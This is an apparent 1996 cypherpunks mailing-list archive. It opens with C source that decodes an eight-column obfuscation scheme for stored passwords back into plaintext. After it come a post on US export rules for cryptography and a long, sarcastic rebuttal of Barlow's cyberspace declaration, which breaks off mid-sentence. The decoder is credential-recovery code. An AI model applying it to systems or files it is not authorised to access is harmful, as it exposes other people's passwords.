 * right, load this file up in a text editor that supports greater than
 * 80 columns.
 *
 *   Encoded byte (hex)    - 1F 1E 1D 1C 1B 1A 19 18 17 16 15 14 13 14 11 10 0F OE 0D 0C 0B 0A 09 08 07 06 05 04 03 02 01 00
 *   ASCII value (decimal) - 42 43 40 41 46 47 44 45 34 35 32 33 38 39 36 37 58 59 56 57 62 63 60 61 50 51 48 49 54 55 52 53
 *   Pair #                - |_6_| |_5_| |_8_| |_7_| |_2_| |_1_| |_4_| |_3_| |14_| |13_| |16_| |15_| |10_| |_9_| |12_| |11_|
 *   Quad #                - |__________2__________| |__________1__________| |__________3__________| |__________4__________|
 *   32 byte block #       - |______________________________________________1______________________________________________|
 *
 * The "Pair #", "Quad #", and "32 byte block #" rows each are there to
 * make the general ordering of the code more visible.  The first thing to
 * note is that the range of encoded byte values runs from 00 to 1f.  This
 * will not always be the case for the first set of 32 characters.  In
 * fact, the next set of 32 characters (ASCII 64 to ASCII 95) is not in
 * the range of 20 to 3f in encoded form.  I never concerned myself with
 * predicting exactly where each of the four 32 byte ranges are aligned
 * within the range of 0 to 256.  In my decoding scheme, I simply specify
 * the location of the first character in a 32 byte block (which I have
 * pre-determined via experimentation) and determine the locations of the
 * rest of the characters in the block relative to the inital value.  This
 * amounts to a total of four hand-decoded characters for the entire code.
 *
 * From a starting point which is given (in this case the fact that ASCII
 * 32 is encoded as 0x15), my decoding scheme follows a pattern that is
 * probably already apparent to you if you have examined the above table
 * closely.  First, if the encoded byte number is odd, it simple subtracts
 * one from this byte number to get the byte number of the encoded form of
 * the subsequent character.  This is much more simple than it sounds.
 * As an example, given that the code for ASCII 32 is 0x15, the program
 * knows that the code for ASCII 33 must be 0x14.  The tricky part is that
 * this is not always true for every code.  Recall that there is a different
 * coding scheme for each of the 8 columns in a password, and that the above
 * table only describes the coding scheme for the first column.  Other columns
 * reverse this relationship between the two ASCII values of a certain pair.
 *
 * Pairs are grouped into units of four, appearing in a predefined pattern.
 * In this case, the first pair (by first I mean the pair with the lowest
 * set of ASCII values) is put in the second slot of a quad (which contains
 * four pairs).  The second pair is put in the first slot, the third is put
 * in the fourth quad, and the fourth is put in the third quad.  This changes
 * depending on the specific code used (of the 8 possible).
 *
 * Quads also fill a block in the same manner, however the ordering is NOT
 * necessarily the same as the way pairs fit into quads!  As I described
 * above, there are four blocks, and they fit into the entire range of
 * 128 values just as pairs fit into quads and quads fit into blocks,
 * via a pattern determined by whoever invented this encoding scheme.  It
 * is important to realize that the range of 128 possible encoded
 * values can be anywhere within the range of 0 to 256.  Ie: One block can
 * be positioned from 0x00 to 0x1f, while another block in the same code
 * can be positioned from 0xa0 to 0xbf.
 *
 * I realize that the above description is a bit complex, and it doesn't
 * really cover much of _how_ my program decodes the the encoded values.
 * If you honestly can't understand a word I've said, just go back to
 * the table and really take a long look at it.  Print it out, put it
 * under your pillow when you go to sleep.  Sooner or later the order
 * of it all will dawn on you and you should be able to step through
 * my code and see how it derives its answer, at least for the
 * DecodeCharOne() routine.  Seven other tables (which I have rough
 * copies of here on notebook paper) were needed to come up with
 * the seven other decoders for the seven other character places.
 *
 */

int DecodeCharOne(unsigned char *mychar) {
  int i = 0;        /* Keeps track of the decoded character # minus 32 */
  int cletter = 1;  /* Sets the current letter of the 8 char quad */
  int blockl1 = 1;  /* Sets the current quad */
  int blockl2 = 1;  /* Sets the current 32 char block */
  int retval = 1;
  /* We are on this col of the table: */
  unsigned char code = 0x15;    /* The code for a space */
  
  /* This is the main loop.  It walks through each decoded character, finds
   * its corresponding encoded value, and looks to see if that's the same as
   * the encoded value we are looking for.  If it is, we have found our
   * decoded character!
   */
  while((i<256) && (code != *mychar)) {
    switch (cletter) {
    case 1:
      code--;
      cletter++;
      break;
    case 2:
      code += 3;
      cletter++;
      break;
    case 3:
      code--;
      cletter++;
      break;
    case 4:
      code -= 5;
      cletter++;
      break;
    case 5:
      code--;
      cletter++;
      break;
    case 6:
      code+=3;
      cletter++;
      break;
    case 7:
      code--;
      cletter++;
      break;
    case 8:
      cletter = 1;
      switch (blockl1) {    /* After we hit character number 8, we have */
      case 1:               /* to do a relative jump to the next quad */
	code += 11;
	blockl1++;
	break;
      case 2:
	code -= 21;
	blockl1++;
	break;
      case 3:
	code += 11;
	blockl1++;
	break;
      case 4:
	blockl1 = 1;
	switch (blockl2) {       /* After we hit the last quad, we have to */
	case 1:                  /* jump to the next 32 character block. */
	  code = 0x75;
	  blockl2++;
	  break;
	case 2:
	  code = 0x55;
	  blockl2++;
	  break;
	case 3:
	  code = 0xb5;
	  blockl2++;
	  break;
	case 4:
	  code = 0x15;
	  blockl2 = 1;
	  break;
	}
	break;
      }
      break;
    }
    i++;
  }
  if (i == 256) retval = 0;
  else *mychar = i + 32;
  return retval;
}  /* End of DecodeCharOne() */

int DecodeCharTwo(unsigned char *mychar) {
  int i = 0;
  int cletter = 1;
  int blockl1 = 1;
  int blockl2 = 1;
  int retval = 1;
  unsigned char code = 0xba;    /* The code for a space */
  while((i<256) && (code != *mychar)) {
    switch (cletter) {
    case 1:
      code++;
      cletter++;
      break;
    case 2:
      code -= 3;
      cletter++;
      break;
    case 3:
      code++;
      cletter++;
      break;
    case 4:
      code += 5;
      cletter++;
      break;
    case 5:
      code++;
      cletter++;
      break;
    case 6:
      code -= 3;
      cletter++;
      break;
    case 7:
      code++;
      cletter++;
      break;
    case 8:
      cletter = 1;
      switch (blockl1) {
      case 1:
      	code -= 11;
	blockl1++;
	break;
      case 2:
	code -= 11;
	blockl1++;
	break;
      case 3:
	code -= 11;
	blockl1++;
	break;
      case 4:
	blockl1 = 1;
	switch (blockl2) {
	case 1:
	  code = 0xda;
	  blockl2++;
	  break;
	case 2:
	  code = 0xfa;
	  blockl2++;
	  break;
	case 3:
	  code = 0x1a;
	  blockl2++;
	  break;
	case 4:
	  code = 0xba;
	  blockl2 = 1;
	  break;
	}
	break;
      }
      break;
    }
    i++;
  }
  if (i == 256) retval = 0;
  else *mychar = i + 32;
  return retval;
}  /* End of DecodeCharTwo() */

int DecodeCharThree(unsigned char *mychar) {
  int i = 0;
  int cletter = 1;
  int blockl1 = 1;
  int blockl2 = 1;
  int retval = 1;
  unsigned char code = 0x6d;    /* The code for a space */
  while((i<256) && (code != *mychar)) {
    switch (cletter) {
    case 1:
      code--;
      cletter++;
      break;
    case 2:
      code += 3;
      cletter++;
      break;
    case 3:
      code--;
      cletter++;
      break;
    case 4:
      code -= 5;
      cletter++;
      break;
    case 5:
      code--;
      cletter++;
      break;
    case 6:
      code += 3;
      cletter++;
      break;
    case 7:
      code--;
      cletter++;
      break;
    case 8:
      cletter = 1;
      switch (blockl1) {
      case 1:
        code -= 5;
        blockl1++;
	break;
      case 2:
        code += 27;
        blockl1++;
        break;
      case 3:
        code -= 5;
        blockl1++;
        break;
      case 4:
	blockl1 = 1;
	switch (blockl2) {
	case 1:
	  code = 0x0d;
	  blockl2++;
	  break;
	case 2:
          code = 0x2d;
          blockl2++;
          break;
	case 3:
          code = 0xcd;
          blockl2++;
          break;
	case 4:
	  code = 0x6d;
	  blockl2 = 1;
          break;
	}
	break;
      }
      break;
    }
    i++;
  }
  if (i == 256) retval = 0;
  else *mychar = i + 32;
  return retval;
}  /* End of DecodeCharThree() */

int DecodeCharFour(unsigned char *mychar) {
  int i = 0;
  int cletter = 1;
  int blockl1 = 1;
  int blockl2 = 1;
  int retval = 1;
  unsigned char code = 0x86;    /* The code for a space */
  while((i<256) && (code != *mychar)) {
    switch (cletter) {
    case 1:
      code++;
      cletter++;
      break;
    case 2:
      code -= 3;
      cletter++;
      break;
    case 3:
      code++;
      cletter++;
      break;
    case 4:
      code -= 3;
      cletter++;
      break;
    case 5:
      code++;
      cletter++;
      break;
    case 6:
      code -= 3;
      cletter++;
      break;
    case 7:
      code++;
      cletter++;
      break;
    case 8:
      cletter = 1;
      switch (blockl1) {
      case 1:
        code += 13;
        blockl1++;
	break;
      case 2:
        code += 13;
        blockl1++;
        break;
      case 3:
        code += 13;
        blockl1++;
        break;
      case 4:
	blockl1 = 1;
	switch (blockl2) {
	case 1:
          code = 0xe6;
          blockl2++;
	  break;
	case 2:
          code = 0xc6;
          blockl2++;
          break;
	case 3:
          code = 0x26;
          blockl2++;
          break;
	case 4:
	  code = 0x86;
          blockl2 = 1;
          break;
	}
	break;
      }
      break;
    }
    i++;
  }
  if (i == 256) retval = 0;
  else *mychar = i + 32;
  return retval;
}   /* End of DecodeCharFour() */

int DecodeCharFive(unsigned char *mychar) {
  int i = 0;
  int cletter = 1;
  int blockl1 = 1;
  int blockl2 = 1;
  int retval = 1;
  unsigned char code = 0x73;    /* The code for a space */
  while((i<256) && (code != *mychar)) {
    switch (cletter) {
    case 1:
      code--;
      cletter++;
      break;
    case 2:
      code--;
      cletter++;
      break;
    case 3:
      code--;
      cletter++;
      break;
    case 4:
      code += 7;
      cletter++;
      break;
    case 5:
      code--;
      cletter++;
      break;
    case 6:
      code--;
      cletter++;
      break;
    case 7:
      code--;
      cletter++;
      break;
    case 8:
      cletter = 1;
      switch (blockl1) {
      case 1:
        code += 7;
	blockl1++;
	break;
      case 2:
        code -= 25;
        blockl1++;
        break;
      case 3:
        code += 7;
	blockl1++;
        break;
      case 4:
	blockl1 = 1;
	switch (blockl2) {
	case 1:
          code = 0x13;
          blockl2++;
	  break;
	case 2:
          code = 0x33;
          blockl2++;
          break;
	case 3:
          code = 0x23;
          blockl2++;
	  break;
	case 4:
	  code = 0x73;
          blockl2 = 1;
          break;
	}
	break;
      }
      break;
    }
    i++;
  }
  if (i == 256) retval = 0;
  else *mychar = i + 32;
  return retval;
}    /* End of DecodeCharFive() */

int DecodeCharSix(unsigned char *mychar) {
  int i = 0;
  int cletter = 1;
  int blockl1 = 1;
  int blockl2 = 1;
  int retval = 1;
  unsigned char code = 0x89;    /* The code for a space */
  while((i<256) && (code != *mychar)) {
    switch (cletter) {
    case 1:
      code--;
      cletter++;
      break;
    case 2:
      code += 3;
      cletter++;
      break;
    case 3:
      code--;
      cletter++;
      break;
    case 4:
      code += 3;
      cletter++;
      break;
    case 5:
      code--;
      cletter++;
      break;
    case 6:
      code += 3;
      cletter++;
      break;
    case 7:
      code--;
      cletter++;
      break;
    case 8:
      cletter = 1;
      switch (blockl1) {
      case 1:
        code -= 13;
	blockl1++;
	break;
      case 2:
	code += 19;
        blockl1++;
	break;
      case 3:
        code -= 13;
	blockl1++;
	break;
      case 4:
	blockl1 = 1;
	switch (blockl2) {
	case 1:
          code = 0xe9;
	  blockl2++;
	  break;
	case 2:
          code = 0xc9;
	  blockl2++;
	  break;
	case 3:
          code = 0x29;
	  blockl2++;
	  break;
	case 4:
	  code = 0x89;
          blockl2 = 1;
          break;
	}
	break;
      }
      break;
    }
    i++;
  }
  if (i == 256) retval = 0;
  else *mychar = i + 32;
  return retval;
}     /* End of DecodeCharSix() */

int DecodeCharSeven(unsigned char *mychar) {
  int i = 0;
  int cletter = 1;
  int blockl1 = 1;
  int blockl2 = 1;
  int retval = 1;
  unsigned char code = 0xf4;    /* The code for a space */
  while((i<256) && (code != *mychar)) {
    switch (cletter) {
    case 1:
      code++;
      cletter++;
      break;
    case 2:
      code++;
      cletter++;
      break;
    case 3:
      code++;
      cletter++;
      break;
    case 4:
      code -= 7;
      cletter++;
      break;
    case 5:
      code++;
      cletter++;
      break;
    case 6:
      code++;
      cletter++;
      break;
    case 7:
      code++;
      cletter++;
      break;
    case 8:
      cletter = 1;
      switch (blockl1) {
      case 1:
        code += 9;
	blockl1++;
	break;
      case 2:
	code -= 23;
        blockl1++;
	break;
      case 3:
        code += 9;
	blockl1++;
	break;
      case 4:
	blockl1 = 1;
	switch (blockl2) {
	case 1:
          code = 0x94;
	  blockl2++;
	  break;
	case 2:
          code = 0xb4;
	  blockl2++;
	  break;
	case 3:
          code = 0x54;
	  blockl2++;
	  break;
	case 4:
	  code = 0xf4;
          blockl2 = 1;
          break;
	}
	break;
      }
      break;
    }
    i++;
  }
  if (i == 256) retval = 0;
  else *mychar = i + 32;
  return retval;
}   /* End of DecodeCharSeven() */

int DecodeCharEight(unsigned char *mychar) {
  int i = 0;
  int cletter = 1;
  int blockl1 = 1;
  int blockl2 = 1;
  int retval = 1;
  unsigned char code = 0x4a;    /* The code for a space */
  while((i<256) && (code != *mychar)) {
     switch (cletter) {
     case 1:
       code++;
       cletter++;
       break;
     case 2:
       code -= 3;
       cletter++;
       break;
     case 3:
       code++;
       cletter++;
       break;
     case 4:
       code += 5;
       cletter++;
       break;
     case 5:
       code++;
       cletter++;
       break;
     case 6:
       code -= 3;
       cletter++;
       break;
     case 7:
       code++;
       cletter++;
       break;
     case 8:
       cletter = 1;
       switch (blockl1) {
       case 1:
	 code -= 11;
	 blockl1++;
	 break;
       case 2:
	 code += 21;
	 blockl1++;
	 break;
       case 3:
	 code -= 11;
	 blockl1++;
	 break;
       case 4:
	 blockl1 = 1;
	 switch (blockl2) {
	 case 1:
	   code = 0x2a;
	   blockl2++;
	   break;
	 case 2:
	   code = 0x0a;
	   blockl2++;
	   break;
	 case 3:
	   code = 0xea;
	   blockl2++;
	   break;
	 case 4:
	   code = 0x4a;
	   blockl2 = 1;
	   break;
	 }
	 break;
       }
       break;
     }
     i++;
  }
  if (i == 256) retval = 0;
  else *mychar = i + 32;
  return retval;
}    /* End of DecodeCharEight() */

/* End of program */


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMR4peyoZzwIn1bdtAQE0dQF9GzqfuxYsYp+x7nVKG0Kz3de74E4HBHxf
IleTsbVrWWQWkV09WU7AVkvVlsajnhsC
=r6cs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 12 Feb 1996 04:02:27 +0800
To: cypherpunks@toad.com
Subject: Re: Regulation of citizen-alien communications (Was: Choices)
In-Reply-To: <Pine.3.89.9602111003.B11207-0100000@dal1820.computek.net>
Message-ID: <ZDB6iD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp <erc@dal1820.computek.net> writes:
> On Sun, 11 Feb 1996, Dr. Dimitri Vulis wrote:
>
> >  Export means:
> >
> >  (4) Disclosing or transferring technical data to a foreign person, whether
> >  in the United States or abroad;
> >
> > A foreign person is defined in S 120.11, and means anyone who's not a U.S.
> > citizen. Technical data is defined in S 120.33
>
> Oh?  You mean that I can get busted for giving my Canadian spouse a copy
> of PGP?

Well, I'm not a lawyer. ;-) S 120.11 (Foreign person) goes like this:

 Foreign person means any natural person who is not a "citizen or intending
 citizen" of the United States within the meaning of 8 U.S.Code 1324 b(a)(3).
 It also means any foreign corporation... The term "intending citizen" means a
 person who has been lawfully admitted to the United States for permanent
 residence (and maintains such residence) under the Immigration and
 Naturalization Act (8 U.S.Code 101(a), 1101(a), 60 Stat. 163).

I don't have 8 U.S.Code here (I'm not a lawyer :-), but the "indenting citizen"
bit sounds to me like the INS form which affirms that one intends to stay here
permanently, and to become U.S. citizen once eligible, which those immigrants
who haven't been in the U.S. long enough to apply for citizenship are asked to
show when they apply for certain jobs, like the NYC Board of Ed.

So -- I think that if the climate in the U.S. reverts to what it was in the
'50's, a zelous prosecutor might tell a grand jury that you gave munitions to a
"forriner", and you might be indicted, and the onus would be on you to prove
that your wife was an "intending citizen".

All this smacks of Nazism.

P.S. Last time I taught an undergraduate computer security course, my floppy
disk handouts contained, inter alia, PGP, and I didn't ask which students were
U.S. citizens.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strata@virtual.net
Date: Mon, 12 Feb 1996 05:21:41 +0800
To: extropians@extropy.org
Subject: A Cyberspace Independence Refutation
Message-ID: <CMM.0.90.2.824072084.strata@virtual-city.virtual.net>
MIME-Version: 1.0
Content-Type: text/plain


Mr. Barlow, you've done many good things for cyberspace and individual
rights, and I respect you for that.  BUT...I have a major bone to pick
with this.  I'm not accusing you personally of anything, but I think
this document is going to cause more trouble than it's worth, and
large chunks of it are patently untrue.  Untrue documents that inspire
people to correct their mistakes can be uplifting, but this one
inspires a level of smug self-righteousness that's not going to make
the net a better place.  See details below.

>To: barlow@eff.org
>From: John Perry Barlow <barlow@eff.org>
>Subject: A Cyberspace Independence Declaration

>It attempts to place more restrictive constraints on the conversation
>in Cyberspace than presently exist in the Senate cafeteria, where I
>have dined and heard colorful indecencies spoken by United States
>senators on every occasion I did.

Good call, by the way.   I hope the foreword re: hypocrisy also goes
into the book.

>Or, more to the point, let us now take our leave of them. They have
>declared war on Cyberspace. Let us show them how cunning, baffling,
>and powerful we can be in our own defense.

Let us show them how cunning, baffling, and powerful we can be as
armed federal marshals walk into a major ISP and shut down their
routers, as replays of Operation Sun Devil occur in people's houses,
as major idiocy of the sort that only a scared government in a country
which considers itself free can carry out.  I don't know which is more
disheartening, the actions themselves or the spirit of "we're doing
this for your own good" in which they are carried out.  But I
digress.  All the little-boy fantasies of the Powerful Internet don't
mean two beans when an officially sanctioned thug turns the switch
from 1 to 0 on your POP.  It'll happen.  Just watch.

>I have written something (with characteristic grandiosity) that I hope

Yes.

>You can leave my name
>off it if you like, because I don't care about the credit. I really
>don't.

I believe you.  It's one of the admirable qualities you have.

>But I do hope this cry will echo across Cyberspace, changing and
>growing and self-replicating, until it becomes a great shout equal to
>the idiocy they have just inflicted upon us.

Yes, that's what I'm afraid of.  See my opening remarks.

>A Declaration of the Independence of Cyberspace

>Governments of the Industrial World, you weary giants of flesh and
>steel, I come from Cyberspace, the new home of Mind. On behalf of the
>future, I ask you of the past to leave us alone. You are not welcome
>among us. You have no sovereignty where we gather.

Oh, let's start right off pretending that 
a) the net is an independently funded entity with no government
infrastructure and
b) independent of (non-electronic) world society and world government

While we're at it, let's press a monkey-brain hot button in any person
of political power by saying their power does/should not apply here.
This will not only make them receptive to the reasoning which we will
lay out in the rest of the document, it will impress them with our
real-world suavity, tact, and general with-it-ness.

>We have no elected government, nor are we likely to have one, so I

Nature abhors a vacuum.  I assume it surprises no one that much of the
major flack about the net began when it became widely known to
government that the net considered itself anarchic.

>address you with no greater authority than that with which liberty
>itself always speaks. I declare the global social space we are
>building to be naturally independent of the tyrannies you seek to
>impose on us. 

You must be talking about IPV6. Sorry, I couldn't resist.  But
certainly the TRA and various other things will be *much* easier to
implement in the IPV6 Internet.  Control structures exist to be used,
gang.

>You have no moral right to rule us 

Hello?  Are we laboring under the belief that even a scant majority of
governments truly believe in the morality of their rule?  Or, since a
government is a collection of individuals who tend to act with the
worst instincts of a mob when only a few are present, that the
individuals themselves feel that they are morally entitled to rule?

>						 nor do you possess
>any methods of enforcement we have true reason to fear.

Like walking into MAE-WEST and powering it down due to court orders.
Nope.  None at all.

>Governments derive their just powers from the consent of the governed.

Yes.  

>You have neither solicited nor received ours. We did not invite you.

We took a defense department network and ran with it, but since we've
been playing with it for over a decade, it's ours now.  Just like when
the neighbor kid loaned us his toy and we fixed it up, painted it, put
new wheels on it, and now he wants it back!  WAAAAAAHHHH!

>You do not know us, nor do  you know our world. Cyberspace does not
>lie within your borders. 

Yes, but.  Inasmuch as the culture of cyberspace grows from (as you
say below) the actions of individuals, it grows from the "real world"
(I hate that phrase, but need to use it to be clear).  We were all
raised in that world, that world provides many (perhaps most) of the
denizens of cyberspace with their livelihoods and access, and both
encourages and constrains their actions, from the engineer who
subscribes to a gay mailing list secretly for fear of losing his job
to the public policy advocate who openly posts pro-net/anti-censorship
material to com-priv in defiance of her government post.

>			  Do not think that you can build it, as though
>it were a public construction project. You cannot. 

Yes.  Though "building" is not quite what I'd call it.  More like
when they bulldoze a section of neighborhood which is actually a haven
for poor families and an extended culture simply because the buildings
and the cultural ways are deemed "unsightly"-- large families living
in small apartments and hanging out their washing, sitting out on the
stoop being neighborly, etc.  Townhouses come up and people don't know
their neighbors anymore, but it "looks nice" and thus must be
progress.  

>						   It is an act of
>nature and it grows itself through our collective actions.

Yes, but see "real world influence" above.


>You have not engaged in our great and gathering conversation, 

No comment.

>							       nor did
>you create the wealth of our marketplaces. 

You did not pour money down ratholes such as highspeed nets to carry
talk.bizarre, sf-lovers, and bandykin because the technical
administrators of the existing, government-funded networks knew that
cyberspace could emerge if DARPA were tricked into creating it.  "Our
links are already almost saturated!"  You did not provide countless
network pioneers a living from government grants nor complain when
they spent much of their research time writing network utilities
rather than doing AI or compilers or what they were actually being
paid to do.  You did not pay people to build the network.  You did not
provide free access and TACACS cards to anyone with the savvy to just
ask for them in the late 70's and early 80's, helping grow the core of
network culture.  You did not again and again provide equipment and
resources only to watch them become privatized by the core of
sysadmins and techies that you paid over the years, often in outright
blackmail ("we'll walk away unless you sell/give us the equipment and
facility").  And you certainly didn't do this only to see the same
people utterly denigrate the access to those resources and claim that
only their time, attention, and effort created the network and
cyberspace.  Clearly they could have done it without any money,
machines, or extant wiring, it was merely more efficient use of their
valuable time to do it at your expense.

>					    You do not know our
>culture, our ethics, or the unwritten codes that already provide our
>society more order than could be obtained by any of your impositions.

Yes, like "thou shalt not take home equipment from one's company,
university, or govt office without paying for it, even if it is older
or unused".  Or "thou shalt not steal computer time, long-distance
services, etc".

>You claim there are problems among us that you need to solve. You use
>this claim as an excuse to invade our precincts. Many of these
>problems don't exist. 

No argument here.  Dead on, as far as I'm concerned.

>Where there are real conflicts, where there are
>wrongs, we will identify them and address them by our means. 

Like use of copyrighted material, for instance.  We who forward things
from the "experimental" (but going for years) AP and NYT news wire
feeds, the Dave Barry mailing lists, the Calvin and Hobbes cartoon
daily web sites, we will identify them and address them by our means
if we ever decide there's a problem there that we actually care about.
Same with snuff stories about real people, harrassment of women,
minorities, or homo/bi/trans-sexuals online, etc.   Online advertising
actually bothers us, so we completely smite and try to drive out of
business people who are clueless enough to try spamming.  So what if
it's like executing someone for a traffic offense, they should have
read the manual before logging in.  In the "real world", few of us
bother to go to the post office and fill out a card saying "refuse all
mail to 'Resident'" because it's too much trouble, thus passively
acquiescing to the torrents of junkmail and flyers we get from our
neighborhood stores.  I wonder why they get the idea that direct mail
works?

>								We are
>forming our own Social Contract . This governance will arise according
>to the conditions of our world, not yours. Our world is different.

No kidding.  But more on that later, with both barrels.

>Cyberspace consists of transactions, relationships, and thought
>itself, arrayed like a standing wave in the web of our communications.
> Ours is a world that is both everywhere and nowhere, but it is not
>where bodies live.

Ooo, mystical.  My bones are shaking, help me!  Our bodies may not
live there, but our endocrine systems sure do...

>We are creating a world that all may enter without privilege or
>prejudice accorded by race, economic power, military force, or station
>of birth.

Right, only by ISP and spelling and punctuation ability.  This
paragraph is where I decided I finally had to come out and call
bullshit to this whole thing.  And how many of the people on the mailing lists
that claim to be full of internet liberators, free-speech advocates,
people who are "building cyberspace" etc look at something posted by,
say, an AOL account, with the same level of fair judgement as they do
a .stanford.edu or some well-known company name?   How many postings
with good ideas have been publicly ridiculed on any number of lists
and newsgroups because of spelling or punctuation errors?
How many posts with an obviously female account name have been
publicly denigrated with "wow, you must be PMS today"?

How about "we are creating a world that all may enter without
privilege or prejudice as long as they conform to certain literary
standards, have a gender-neutral account name, and don't take potshots
at any sacred net.religious institutions such as 'cancel poodles' (ah
those paragons of democratic free speech), flame wars, and the utterly
omniscient and fair judgement of the net.gods, who have proven
themselves in the majority of cases to have written prodigious network
utilities and made major technical contributions, and therefore must
be reasonable, impartial, and pure of heart."

>We are creating a world where anyone, anywhere may express his or her
>beliefs, no matter how singular, without fear of being coerced into
>silence or conformity.

I'm rolling on the floor, but I'm not sure if I'm laughing or crying.
WHAT PLANET ARE YOU FROM?   Can someone take an anonymous poll of the
Known Network and ask the following:  "I routinely refrain from
posting my opinions or beliefs to mailing lists and/or newsgroups for
fear of flaming, harrassment, or ridicule, even when I am confident of 
those beliefs or opinions  (strongly-disagree  disagree no-opinion agree
strongly-agree)"   Think about how many mailing list or newsgroup
communities are real communities, and how rare they are, and how they
go downhill because "too many people hear about it" and people stop
feeling that they can participate fully without fear of squelching.

Hell, look what the cypherpunk community did to Detweiler!  I've never
met the man, but I've read his papers and he doesn't seem like a total
nut case to me.  It's one thing to ostracize someone, but baiting them
is going a little far.  Similar things have happened in many online
communities.  "Yeah, there are some real nut cases out there, and
sooner or later a big enough community runs into them".  Even if we
accept that, does that mean we have to handle them with a complete
lack of compassion?  Do we have to be little boys with sticks
tormenting a wounded animal?  I don't think so.

>Your legal concepts of property, expression, identity, movement, and
>context do not apply to us. They are based on matter, There is no
>matter here.

Awesome.  Among other things, all those .sigs saying that the
Microsoft Network consents to such-and-such fees if they redist this
message, or that this message is copyright the Extropy Inc folks if it
appears on this list, etc are just hot air, and those folks won't mind
it.  For that matter, source code copyrights on the net are just a
quaint custom, and so are people's personal privacy expectations with
regard to their email and to their files.  I mean,
electronic privacy isn't a concept of property, identity, or
expression is it?  What's all this fuss about crypto?  Silly people,
those legal concepts don't apply here!!!  Now go read your users mail
like a good sysadmin and turn in heretics to the thought police.  Mr.
Barlow says it's okay, right here in this widely-forwarded document!

Now I understand why there is no fear of the plug being pulled-- so
what if this message is being read on a physical screen and is stored
on a physical disk, with a physical junction joining it to the network,
"there is no matter here".  The fact that the computer on which you
read this may belong to someone else, may be shut down without your
control, may be being misused according to their intent just by
transmitting this message, that is irrelevant!  OMMMMMMM-- are you
receiving this message?  OMMMMMMMM....

>Our identities have no bodies, so, unlike you, we cannot obtain order
>by physical coercion. 

The persons we have kicked off numerous online services, such as
Cantor & Seigel, email harrassers, stalkers, etc are not really "us",
so this statement is entirely self-consistent, Selah.


>		       We believe that from ethics, enlightened
>self-interest, and the commonweal, our governance will emerge . Our
>identities may be distributed across many of your jurisdictions. The
>only law that all our constituent cultures would generally recognize
>is the Golden Rule. 

Even if we don't apply it universally to ourselves, only to those
online bodiless entities who meet with our approval and are clearly
also members of the intellectual and anarchic elite!

>			We hope we will be able to build our particular
>solutions on that basis.  But we cannot accept the solutions you are
>attempting to impose.

Why yes.  Bad law on a bad situation does not make it right.  Again,
I agree here.

>In the United States, you have today created a law, the
>Telecommunications Reform Act, which repudiates your own Constitution
>and insults the dreams of Jefferson, Washington, Mill, Madison,
>DeToqueville, and Brandeis. These dreams must now be born anew in us.

Cool.  I wonder how much hate mail I will get for this commentary?
Perhaps I will be immediately dismissed as 
a) not a member of the technical elite of netdom or hackerdom, and
therefore clueless
b) an outsider, ditto (hey, I've only been on the net since 1981, I'm
just a pup; and I never became a netnews household word)
c) a woman, who is probably on the rag

>You are terrified of your own children, since they are natives in a
>world where you will always be immigrants. Because you fear them, you
>entrust your bureaucracies with the parental responsibilities you are
>too cowardly to confront yourselves. In our world, all the sentiments
>and expressions of humanity, from the debasing to the angelic, are
>parts of a seamless whole, the global conversation of bits. We cannot
>separate the air that chokes from the air upon which wings beat.

Set BOLE generators on HYPER, captain.  Aye aye!

Please.  This sort of thing is so riddled with inaccuracies,
hypocrisy, half-truths, and the occasional kernel of absolute
correctness that it ought to be taken out and shot.  Where are *our*
"parental responsibilities" to network newcomers, to AOL and the
Microsoft Network people (to name a few)?  How many of the self-avowed
denizens of cyberspace feel like "natives" in the "real world"?  How
many decent politicians do you think are out there trying to do their
job and being confronted with only a single tarbrush of shirking
spineless cowardice?  Yes, I should give up my political career and
the hope of building new housing in my district, getting more school
funding, etc for a bunch of twenty (or thirty)-something
non-constitutents who think of me as a pustulent gastropod.  I'll run
right out and vote against TRA!!

How much do you go out of your way for people who openly despise you
and publicly declare your stupidity with every other breath?


>In China, Germany, France, Russia, Singapore, Italy and the United
>States, you are trying to ward off the virus of liberty by erecting
>guard posts at the frontiers of Cyberspace. These may keep out the
>contagion for a small time, but they will not work in a world that
>will soon be blanketed in bit-bearing media.

PTHTHT.   Take a look at the hierarchic network structure.  Have you
made your BIND mods yet to allow alternate root-level nameservers?
Tsk tsk-- how will people find you after your domain name gets taken
out of the InterNIC servers and your ISP is forced to pull your
network number or get shut down?  Or rather, how will other people
besides your group of fellow net.elite peers find you?

>Your increasingly obsolete information industries would perpetuate
>themselves by proposing laws, in America and elsewhere, that claim to
>own speech itself throughout the world. These laws would declare ideas
>to be another industrial product, no more noble than pig iron. In our
>world, whatever the human mind may create can be reproduced and
>distributed infinitely at no cost. The global conveyance of thought no
>longer requires your factories to accomplish.

See copyright issues in various places above.  

And what the hell are you referring to by "ideas as an industrial
product"?  It sounds very noble, but it has little to do with freedom
of speech on the net!  As we have all seen, many industrial products
ranging from inflatable sheep to magazines as respectable as the "New
Yorker" don't have to conform to the provisions of the TRA.

And the "global conveyance of thought" hasn't needed factories ever.
Broadcast communications media have sufficed, ranging from newspapers
to radio to satellite TV.

>These increasingly hostile and colonial measures place us in the same
>position as those previous lovers of freedom and self-determination
>who had to reject the authorities of distant, uninformed powers. We
>must declare our virtual selves immune to your sovereignty, even as we
>continue to consent to your rule over our bodies. We will spread
>ourselves across the Planet so that no one can arrest our thoughts.

Isn't that special.  Not all of us can afford to go to Switzerland,
John.

>We will create a civilization of the Mind in Cyberspace. May it be
>more humane and fair than the world your governments have made before.

We've got a hell of a lot of work to do, then.  Let's start by not
flaming people at the drop of a hat.  Perhaps I myself am guilty of
this-- everyone who flames thinks they have a good enough reason.
But unlike some people, I've never claimed to be a superior being.

>Davos, Switzerland
>February 8, 1996

>John Perry Barlow, Cognitive Dissident

************

I don't know what the "right" things to do are to protect free speech
on the net.  I'm trying to figure that out, like many of you.  I do
know, or rather, passionately believe, that missives like this
Declaration are a major red herring.  Every person who takes his or
her five minutes to forward this to another mailing list or to his or
